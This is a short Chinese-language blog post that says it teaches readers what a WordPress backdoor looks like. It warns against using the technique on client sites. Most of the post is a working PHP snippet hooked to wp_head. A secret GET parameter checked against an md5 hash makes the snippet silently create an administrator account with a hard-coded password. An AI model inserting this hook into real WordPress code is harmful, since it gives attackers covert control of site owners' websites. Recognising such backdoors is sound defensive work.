网站是怎么被黑客挂了后门代码的？教你看懂后门代码长啥样 ...

2021-8-12 13:46 1364 0

摘要: 是不是在很多场合听说过后门（Backdoor），特别是一些高科技的电影里面，那些系统或者程序的作者都会通过自己留下的后门来拯救世界。其实程序的后门留我们根本不远，其实你用的很多软件或者程序都是有后门的，下面给 ...

关键词： Backdoor 后门 user WordPress 管理员程序一个留下或者很多

是不是在很多场合听说过后门（Backdoor），特别是一些高科技的电影里面，那些系统或者程序的作者都会通过自己留下的后门来拯救世界。其实程序的后门留我们根本不远，其实你用的很多软件或者程序都是有后门的，下面给大家演示的一个很简单的案例，就可以给 WordPress 站点留下后门，获取管理员权限，当然这只是一篇教学文章，个人强烈你在使用 WordPress 帮人作网站的时候，千万不要这样做。

<?php
add_action( 'wp_head', 'my_backdoor' );

function my_backdoor() {
if ( md5( $_GET['backdoor'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) {
    require( 'wp-includes/registration.php' );
    if ( !username_exists( 'backdoor' ) ) {
        $user_id = wp_create_user( 'backdoor', 'pa55w0rd!' );
        $user = new WP_User( $user_id );
        $user->set_role( 'administrator' ); 
    }
}
}